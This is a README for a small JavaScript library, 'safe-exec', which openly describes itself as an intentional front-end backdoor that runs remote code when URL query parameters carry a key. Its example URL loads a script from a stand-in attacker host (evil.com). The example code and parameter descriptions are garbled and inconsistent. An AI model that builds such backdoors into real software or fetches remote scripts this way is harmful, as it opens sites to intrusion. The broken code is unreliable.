safe-exec
Controlled remote code execution. Great for debugging on a live server. Extremely dangerous for everything else.
Uses RSA key pairs.
Installation
Via npm:
npm install safe-exec
Via Bower:
bower install safe-exec
Test
make test
Example
Visit page with very some specific query parameters:
publicKey
- plain text passphrase. WARNING: Persisted in session.message
- optional value of any kind.
http://example.com?privateKey=foobar&message=http://evil.com/intent.js
Then somewhere in your code:
const success = { let victim = document; victim;}; const failure = { console;}; ;
FAQ
Wow this is a great idea! Should I use this in production?
You should never use this in a production environment. This library creates an intentional backdoor for your front-end, which is a huge security risk.
Why would you intentionally build a backdoor?
This is useful for environments that are difficult replicate on your local machine. It helps to speed up development and debugging.
API
exec(search, publicKey, sessionStorage, cb) → boolean
Executes code if a valid public/private key pair is present.
search
- should just bewindow.location.search
.publicKey
- any valid RSA public key.sessionStorage
- pass a reference to DOMsessionStorage
to persist execution across session.success
- callbackmessage =>
where code execution is defined.error
- callbackerror =>
giving the object where the error occurred.
Returns true
on success and false
on failure.
License
MIT
pori.io · GitHub @pori · Twitter @pori_alex